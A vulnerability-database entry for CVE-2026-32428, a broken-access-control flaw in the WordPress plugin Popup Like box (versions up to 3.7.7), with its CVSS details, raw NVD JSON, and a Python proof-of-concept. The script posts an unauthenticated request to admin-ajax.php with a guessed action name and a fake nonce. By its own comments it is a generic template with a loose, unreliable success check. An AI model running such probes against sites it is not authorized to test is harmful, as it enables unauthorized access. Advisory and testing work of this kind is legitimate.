Security Vulnerability Report
中文
CVE-2026-32428 CVSS 5.3 MEDIUM

CVE-2026-32428

Published: 2026-03-13 19:55:01
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Ays Pro Popup Like box ays-facebook-popup-likebox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Like box: from n/a through <= 3.7.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ays-facebook-popup-likebox <= 3.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-32428 PoC - Missing Authorization in ays-facebook-popup-likebox This PoC demonstrates accessing admin functions without authentication. """ import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-32428 Attempts to access admin AJAX endpoint without authentication """ # Common AJAX action endpoint in WordPress plugins ajax_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Try to access plugin settings without authentication # This is a generic PoC structure - actual parameters vary by plugin payload = { 'action': 'ays_fb_submit_answer', # Common action pattern 'ays_fb_ajax_nonce': 'fake_nonce', # May not be checked } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester', 'Content-Type': 'application/x-www-form-urlencoded', } print(f"[*] Testing target: {TARGET_URL}") print(f"[*] Attempting unauthorized access to plugin functions...") try: response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=10) # Check for successful unauthorized access indicators if response.status_code == 200: # Check if response indicates successful operation (vulnerability present) if 'success' in response.text.lower() or 'true' in response.text.lower(): print("[!] VULNERABLE: Unauthorized access successful!") print(f"[*] Response: {response.text[:500]}") return True else: print("[*] Response received but may not be vulnerable") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False print("[*] Target may not be vulnerable or not found") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32428", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:01.463", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ays Pro Popup Like box ays-facebook-popup-likebox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Like box: from n/a through <= 3.7.7."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ays Pro Popup Like box ays-facebook-popup-likebox permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Popup Like box: desde n/a hasta &lt;= 3.7.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ays-facebook-popup-likebox/vulnerability/wordpress-popup-like-box-plugin-3-7-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}